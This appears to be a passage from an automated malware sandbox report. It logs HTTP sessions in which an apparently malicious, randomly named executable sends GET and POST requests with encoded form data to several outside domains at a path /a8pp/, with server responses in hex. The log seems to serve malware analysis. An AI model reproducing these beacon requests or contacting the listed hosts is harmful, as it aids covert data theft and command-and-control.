                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        57192.168.11.304985134.120.137.41807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:38:22.421736956 CEST474OUTGET /a8pp/?2NlhHLS8=r0doAxZ3McO8R7mp6qgWn+QezPvbJ5C3ABRrOyl6CgStm79gYC3TLiYjX4kN1s0MQxHF3gG5Bk+z6JgKa4/gtkT7Na90zaRN/cPyIALa2DchOg495vj9RRI=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.blissfulbooks.online
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:38:22.571403980 CEST606INHTTP/1.1 301 Moved Permanently
                                        Server: openresty
                                        Date: Tue, 04 Jun 2024 12:38:22 GMT
                                        Content-Type: text/html
                                        Content-Length: 166
                                        Location: http://www.blissfulbooks.online/a8pp?2NlhHLS8=r0doAxZ3McO8R7mp6qgWn+QezPvbJ5C3ABRrOyl6CgStm79gYC3TLiYjX4kN1s0MQxHF3gG5Bk+z6JgKa4/gtkT7Na90zaRN/cPyIALa2DchOg495vj9RRI=&0z=jXZhddsppL
                                        X-Hostinger-Datacenter: gcp-usc1
                                        X-Hostinger-Node: gcp-usc1-builder-edge2
                                        Via: 1.1 google
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        58192.168.11.3049852160.124.114.188807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:38:27.917610884 CEST760OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.click-advertising.net
                                        Origin: http://www.click-advertising.net
                                        Referer: http://www.click-advertising.net/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 4f 64 46 59 66 58 33 45 43 2b 76 33 51 6b 59 76 73 74 67 6f 7a 47 36 4f 32 58 63 33 35 63 47 77 70 2f 54 4b 53 66 4b 2b 45 64 37 73 53 55 73 55 57 78 78 4e 59 77 69 65 53 37 4d 77 37 61 67 51 72 76 71 6a 34 64 57 63 6d 72 77 4b 75 64 62 33 36 74 37 37 76 69 77 2f 51 6c 46 6f 75 42 78 32 52 4d 74 31 74 68 35 4a 6f 79 32 61 4a 59 31 45 43 6a 6b 38 62 2f 6e 4c 74 73 5a 45 63 32 54 79 6f 59 6f 6c 72 46 34 4d 47 6c 68 35 6a 32 4a 38 65 52 46 35 38 69 68 39 4c 42 62 32 63 52 38 44 36 7a 37 4a 43 6d 43 32 56 73 63 73 54 44 46 47 30 36 63 74 78 79 71 36 48 53 46 71 38 4c 78 79 4e 67 3d 3d
                                        Data Ascii: 2NlhHLS8=OdFYfX3EC+v3QkYvstgozG6O2Xc35cGwp/TKSfK+Ed7sSUsUWxxNYwieS7Mw7agQrvqj4dWcmrwKudb36t77viw/QlFouBx2RMt1th5Joy2aJY1ECjk8b/nLtsZEc2TyoYolrF4MGlh5j2J8eRF58ih9LBb2cR8D6z7JCmC2VscsTDFG06ctxyq6HSFq8LxyNg==
                                        Jun 4, 2024 14:38:28.261450052 CEST381INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:38:28 GMT
                                        Content-Type: text/html;charset=gb2312
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Content-Encoding: gzip
                                        Data Raw: 61 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 35 ca 31 0e 82 30 14 80 e1 ab 34 9d a9 c4 bd e5 2e 4d 79 89 8f d0 42 e8 13 3c 93 83 c1 81 68 22 1d 8c 32 e8 c2 20 f1 0a 5e c2 41 23 71 fc bf fc 92 90 72 48 6e e3 65 98 fa e1 7a de 8e dd 21 dc 83 38 86 f0 ee 5e a7 f6 b9 0f 8f a9 6f 77 32 9e 47 69 81 34 73 da 82 e2 35 42 53 16 15 71 66 0a 47 e0 48 f1 06 53 5a a9 14 6a 34 20 7e 11 31 74 48 a8 73 e1 8d ce 41 2d 23 66 f5 06 ed da fe 81 27 d2 9b 0a 4b 62 be 32 8a c7 99 5f 64 fe 8b f1 ac c9 07 08 74 14 f7 a3 00 00 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: a55104.MyB<h"2 ^A#qrHnez!8^ow2Gi4s5BSqfGHSZj4 ~1tHsA-#f'Kb2_dt0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        59192.168.11.3049853160.124.114.188807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:38:30.755244017 CEST780OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.click-advertising.net
                                        Origin: http://www.click-advertising.net
                                        Referer: http://www.click-advertising.net/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 4f 64 46 59 66 58 33 45 43 2b 76 33 52 46 6f 76 75 4f 34 6f 31 6d 36 4e 35 33 63 33 32 38 47 30 70 2f 66 4b 53 65 2b 75 44 6f 6a 73 4c 32 6b 55 58 31 74 4e 5a 77 69 65 47 72 4d 31 6a 36 67 50 72 76 6e 63 34 63 71 63 6d 72 30 4b 75 66 54 33 36 61 50 38 73 53 77 39 4c 56 46 6d 78 78 78 32 52 4d 74 31 74 68 74 76 6f 7a 65 61 49 72 74 45 51 58 77 2f 54 66 6e 45 37 38 5a 45 59 32 54 75 6f 59 70 32 72 45 6b 71 47 67 39 35 6a 33 35 38 66 45 70 2b 76 43 68 37 47 68 61 58 55 52 6f 50 2b 69 4b 2b 44 68 2b 44 56 64 55 72 53 55 30 63 70 35 6f 76 69 53 57 58 62 54 6f 43 2b 4a 77 70 51 6f 6a 73 68 78 49 5a 6a 50 4f 4c 49 73 55 7a 30 6c 69 37 65 42 67 3d
                                        Data Ascii: 2NlhHLS8=OdFYfX3EC+v3RFovuO4o1m6N53c328G0p/fKSe+uDojsL2kUX1tNZwieGrM1j6gPrvnc4cqcmr0KufT36aP8sSw9LVFmxxx2RMt1thtvozeaIrtEQXw/TfnE78ZEY2TuoYp2rEkqGg95j358fEp+vCh7GhaXURoP+iK+Dh+DVdUrSU0cp5oviSWXbToC+JwpQojshxIZjPOLIsUz0li7eBg=
                                        Jun 4, 2024 14:38:31.068583965 CEST381INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:38:30 GMT
                                        Content-Type: text/html;charset=gb2312
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Content-Encoding: gzip
                                        Data Raw: 61 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 35 ca 31 0e 82 30 14 80 e1 ab 34 9d a9 c4 bd e5 2e 4d 79 89 8f d0 42 e8 13 3c 93 83 c1 81 68 22 1d 8c 32 e8 c2 20 f1 0a 5e c2 41 23 71 fc bf fc 92 90 72 48 6e e3 65 98 fa e1 7a de 8e dd 21 dc 83 38 86 f0 ee 5e a7 f6 b9 0f 8f a9 6f 77 32 9e 47 69 81 34 73 da 82 e2 35 42 53 16 15 71 66 0a 47 e0 48 f1 06 53 5a a9 14 6a 34 20 7e 11 31 74 48 a8 73 e1 8d ce 41 2d 23 66 f5 06 ed da fe 81 27 d2 9b 0a 4b 62 be 32 8a c7 99 5f 64 fe 8b f1 ac c9 07 08 74 14 f7 a3 00 00 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: a55104.MyB<h"2 ^A#qrHnez!8^ow2Gi4s5BSqfGHSZj4 ~1tHsA-#f'Kb2_dt0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        60192.168.11.3049854160.124.114.188807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:38:33.595810890 CEST1697OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.click-advertising.net
                                        Origin: http://www.click-advertising.net
                                        Referer: http://www.click-advertising.net/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 4f 64 46 59 66 58 33 45 43 2b 76 33 52 46 6f 76 75 4f 34 6f 31 6d 36 4e 35 33 63 33 32 38 47 30 70 2f 66 4b 53 65 2b 75 44 72 44 73 4c 6a 77 55 57 55 74 4e 65 77 69 65 5a 62 4d 30 6a 36 67 47 72 76 50 59 34 63 6d 6d 6d 6f 63 4b 38 4d 4c 33 38 76 6a 38 33 43 77 39 55 6c 46 6e 75 42 77 69 52 4d 39 71 74 68 39 76 6f 7a 65 61 49 75 68 45 41 54 6b 2f 65 2f 6e 4c 74 73 5a 32 63 32 54 4b 6f 59 67 44 72 45 68 58 47 54 6c 35 6a 55 52 38 59 32 52 2b 73 69 68 35 56 52 61 31 55 52 31 52 2b 69 58 48 44 68 69 36 56 66 55 72 54 41 6c 77 38 49 6f 50 7a 6c 75 45 48 53 63 70 31 62 5a 37 64 61 54 30 6e 67 6b 43 70 63 48 68 52 5a 73 56 6f 33 4b 6e 4c 57 4d 59 79 43 74 37 68 43 63 33 41 34 52 65 6d 42 38 45 54 65 39 69 59 75 70 73 72 73 33 55 5a 74 66 41 69 45 34 67 65 6b 4c 72 59 4c 63 59 43 71 45 61 35 72 5a 42 63 52 6f 4a 44 46 6e 67 38 6d 6e 59 62 6c 76 7a 66 71 4f 42 76 51 69 6d 4a 6c 73 75 52 6d 73 30 6c 66 44 32 51 4e 37 32 2f 72 72 39 55 38 43 36 64 46 39 37 52 67 64 31 7a 58 72 44 77 [TRUNCATED]
                                        Data Ascii: 2NlhHLS8=OdFYfX3EC+v3RFovuO4o1m6N53c328G0p/fKSe+uDrDsLjwUWUtNewieZbM0j6gGrvPY4cmmmocK8ML38vj83Cw9UlFnuBwiRM9qth9vozeaIuhEATk/e/nLtsZ2c2TKoYgDrEhXGTl5jUR8Y2R+sih5VRa1UR1R+iXHDhi6VfUrTAlw8IoPzluEHScp1bZ7daT0ngkCpcHhRZsVo3KnLWMYyCt7hCc3A4RemB8ETe9iYupsrs3UZtfAiE4gekLrYLcYCqEa5rZBcRoJDFng8mnYblvzfqOBvQimJlsuRms0lfD2QN72/rr9U8C6dF97Rgd1zXrDwy+/nA0Bas4ntc6Vv5RZ9ZdS8YcOEXwWeEUtOkSzCEHsRvFPNCuTwkL8wWY5cPV+PJM00bRtftq7FK0LvzC7AtfLA7Kpvvukt5v8RJo+7zlQWb2CuS4WC/6Ha6CvY2QPMIC8DWo6wuqC7V2Ej8uYT39hMpD2Ug0dqPGMfeZfmBh8IZf/K64pbfoWPJlwrRfBFkC0iuETc0UoHPPVMuK119IiYmshY0ff278kc900Nbp0hrn814aadg2HGA+uR2T+MM5iyhkicBzxIiV2EVBrCTDo6f+BvtdSVSoLMBXFpPm5zOVKEiN+1mgf5mKsu8xMmkS3+0HuzLc7TOt/0IU2r3eGi91qAEx9gRHzPxUaQyBl5sGq96kCGPaL/eAS/OD6dqylWQtPyzsnIPKPHDBpmhlCjJ1e63HazuvRadHk0epcalcqwRhlDIFljsySIA3GPb6D/Nf1lHA3aICgSpdqAbfwHhC0X/zD1MnujpIhQ9BJQC7wn2VFFQVFkNzqfZGxgO9d246d810LfZLEANF59SRNCmDk3OYl+R92vTHCYVXgt44L4nuIPIFUsD070OeEc36tTBfGshPkxN9MFV0PvDvgu8mvwBnhTHchiuxBu1yFBkq909oqtosldufPFlFK7EnS25x/Q/mm5gfBtzVCsATkRTvR4yd2Vla [TRUNCATED]
                                        Jun 4, 2024 14:38:33.906240940 CEST381INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:38:33 GMT
                                        Content-Type: text/html;charset=gb2312
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Content-Encoding: gzip
                                        Data Raw: 61 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 35 ca 31 0e 82 30 14 80 e1 ab 34 9d a9 c4 bd e5 2e 4d 79 89 8f d0 42 e8 13 3c 93 83 c1 81 68 22 1d 8c 32 e8 c2 20 f1 0a 5e c2 41 23 71 fc bf fc 92 90 72 48 6e e3 65 98 fa e1 7a de 8e dd 21 dc 83 38 86 f0 ee 5e a7 f6 b9 0f 8f a9 6f 77 32 9e 47 69 81 34 73 da 82 e2 35 42 53 16 15 71 66 0a 47 e0 48 f1 06 53 5a a9 14 6a 34 20 7e 11 31 74 48 a8 73 e1 8d ce 41 2d 23 66 f5 06 ed da fe 81 27 d2 9b 0a 4b 62 be 32 8a c7 99 5f 64 fe 8b f1 ac c9 07 08 74 14 f7 a3 00 00 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: a55104.MyB<h"2 ^A#qrHnez!8^ow2Gi4s5BSqfGHSZj4 ~1tHsA-#f'Kb2_dt0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        61192.168.11.3049855160.124.114.188807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:38:36.478188992 CEST475OUTGET /a8pp/?2NlhHLS8=Dft4chLLB7HQRgI1kvQb3UGdiigcwJaJso3MJc+IJoTJW0I2amM0Xj+YeLw4jIoNvtXY/7GemIMI+dXc5vnp9QE1cggkijBoQvQelzZ8ig3DEoIcGDshdqY=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.click-advertising.net
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:38:36.798222065 CEST355INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:38:36 GMT
                                        Content-Type: text/html;charset=gb2312
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Data Raw: 61 33 0d 0a 3c 74 69 74 6c 65 3e c9 cf c3 c5 d4 bc c5 c4 c1 aa cf b5 b7 bd ca bd 2d b8 bd bd fc b5 e7 bb b0 d6 b1 bd d3 d4 bc b0 ae 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: a3<title>-</title><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><script src="/js.js"></script>0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        62192.168.11.304985691.195.240.19807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:38:42.041404009 CEST769OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.continentaloilandgas.com
                                        Origin: http://www.continentaloilandgas.com
                                        Referer: http://www.continentaloilandgas.com/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 54 56 4c 62 5a 58 6e 33 51 65 34 4d 42 6e 62 68 36 4e 67 47 63 67 70 6e 63 44 77 2b 4a 64 62 36 2b 78 79 6c 36 46 5a 66 72 79 42 53 6d 49 4f 50 45 42 48 2b 57 6d 41 38 62 4f 49 32 76 51 31 71 78 4d 2b 33 61 56 30 31 68 73 47 67 62 32 53 75 36 38 32 5a 4d 34 47 41 53 36 69 6a 63 65 47 39 64 75 66 77 63 35 63 55 4e 72 57 47 78 47 79 4f 6a 49 42 61 71 30 64 70 2f 43 58 75 45 36 48 2b 6d 53 69 68 66 30 6e 61 57 58 78 57 4c 49 37 77 57 43 34 37 63 30 2f 4a 2b 38 4d 6a 74 76 4d 30 2f 37 6d 79 73 62 7a 61 70 71 42 66 58 73 53 63 79 77 61 37 4f 69 31 42 61 58 32 43 58 6f 4b 61 50 41 3d 3d
                                        Data Ascii: 2NlhHLS8=TVLbZXn3Qe4MBnbh6NgGcgpncDw+Jdb6+xyl6FZfryBSmIOPEBH+WmA8bOI2vQ1qxM+3aV01hsGgb2Su682ZM4GAS6ijceG9dufwc5cUNrWGxGyOjIBaq0dp/CXuE6H+mSihf0naWXxWLI7wWC47c0/J+8MjtvM0/7mysbzapqBfXsScywa7Oi1BaX2CXoKaPA==
                                        Jun 4, 2024 14:38:42.268013000 CEST208INHTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        63192.168.11.304985791.195.240.19807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:38:44.789134979 CEST789OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.continentaloilandgas.com
                                        Origin: http://www.continentaloilandgas.com
                                        Referer: http://www.continentaloilandgas.com/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 54 56 4c 62 5a 58 6e 33 51 65 34 4d 44 48 72 68 35 75 34 47 65 41 70 67 5a 44 77 2b 63 4e 62 2b 2b 78 2b 6c 36 48 31 50 72 68 6c 53 6e 71 57 50 57 55 7a 2b 58 6d 41 38 56 75 49 35 68 77 30 6b 78 4d 79 52 61 55 59 31 68 73 43 67 62 79 57 75 36 4e 32 57 4d 6f 47 43 5a 61 69 6c 44 75 47 39 64 75 66 77 63 34 34 75 4e 71 2b 47 78 57 43 4f 79 63 55 4d 70 30 63 62 36 43 58 75 4a 61 48 36 6d 53 69 66 66 31 71 50 57 56 5a 57 4c 4d 2f 77 52 57 4d 34 53 30 2f 4c 67 4d 4e 75 73 66 35 73 30 36 6a 47 67 34 50 69 73 37 78 32 53 37 6a 47 76 7a 75 35 64 43 4a 73 47 57 62 71 56 71 4c 42 53 49 56 50 5a 50 6a 6e 6a 74 49 68 39 44 52 2f 6d 47 50 73 31 45 6b 3d
                                        Data Ascii: 2NlhHLS8=TVLbZXn3Qe4MDHrh5u4GeApgZDw+cNb++x+l6H1PrhlSnqWPWUz+XmA8VuI5hw0kxMyRaUY1hsCgbyWu6N2WMoGCZailDuG9dufwc44uNq+GxWCOycUMp0cb6CXuJaH6mSiff1qPWVZWLM/wRWM4S0/LgMNusf5s06jGg4Pis7x2S7jGvzu5dCJsGWbqVqLBSIVPZPjnjtIh9DR/mGPs1Ek=
                                        Jun 4, 2024 14:38:45.014115095 CEST208INHTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        64192.168.11.304985891.195.240.19807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:38:47.542704105 CEST1706OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.continentaloilandgas.com
                                        Origin: http://www.continentaloilandgas.com
                                        Referer: http://www.continentaloilandgas.com/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 54 56 4c 62 5a 58 6e 33 51 65 34 4d 44 48 72 68 35 75 34 47 65 41 70 67 5a 44 77 2b 63 4e 62 2b 2b 78 2b 6c 36 48 31 50 72 68 74 53 6d 5a 65 50 45 6e 72 2b 55 6d 41 38 4c 2b 49 70 68 77 31 34 78 50 43 56 61 55 45 50 68 75 4b 67 4a 48 43 75 7a 66 4f 57 43 6f 47 43 57 36 69 67 63 65 47 6f 64 75 50 30 63 34 6f 75 4e 71 2b 47 78 55 61 4f 69 34 41 4d 76 30 64 70 2f 43 58 59 45 36 48 47 6d 53 72 6e 66 31 76 30 58 6b 35 57 4c 6f 62 77 54 6a 34 34 61 30 2f 4e 68 4d 4d 39 73 66 6c 4e 30 36 75 39 67 35 37 49 73 34 68 32 66 2f 79 6a 35 33 79 31 66 7a 64 46 4a 53 58 6f 56 70 66 4f 58 36 4a 72 52 2f 72 44 6b 70 6b 6f 39 6c 5a 30 31 6e 48 74 32 51 65 53 73 78 6f 62 2b 2b 47 6c 2f 77 4d 51 59 63 6e 37 70 39 68 75 68 2b 79 71 38 4b 46 30 59 36 44 7a 72 52 67 31 74 6b 30 70 47 58 42 64 4c 71 76 30 70 69 67 35 36 53 55 33 61 4b 36 72 61 30 41 38 39 34 65 77 37 66 4b 2b 38 64 4f 6c 42 75 47 64 4c 31 55 72 66 35 34 44 48 6a 72 2b 69 49 2b 6d 30 53 48 55 42 59 6b 33 34 77 7a 53 50 38 4e 63 49 [TRUNCATED]
